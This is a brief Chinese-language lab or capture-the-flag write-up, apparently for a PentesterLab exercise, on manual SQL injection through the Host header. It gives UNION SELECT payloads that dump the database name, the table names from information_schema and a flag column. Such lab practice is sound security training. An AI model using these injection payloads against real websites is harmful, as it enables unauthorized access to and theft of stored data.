手动检测注入点:
测试行数:
联合注入,首先测出是具体哪几行会出现在返回的网页中,可以看到是第2,3,4行会出现,接下来就是进行爆库。
手工注入:
利用头部host注入点加联合注入,来进行爆库:
首先是爆数据库名:
payload:union select 1,2,database(),4%23。
response:pentesterlab(当前数据库名)。
爆表名:
payload:union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='pentesterlab'),4
爆列名:类似于表名(列名为id,flag)。
爆字段:
payload:union select 1,2,(select group_concat(flag) from flag),4
爆完字段后,再丢到主界面验证得到flag~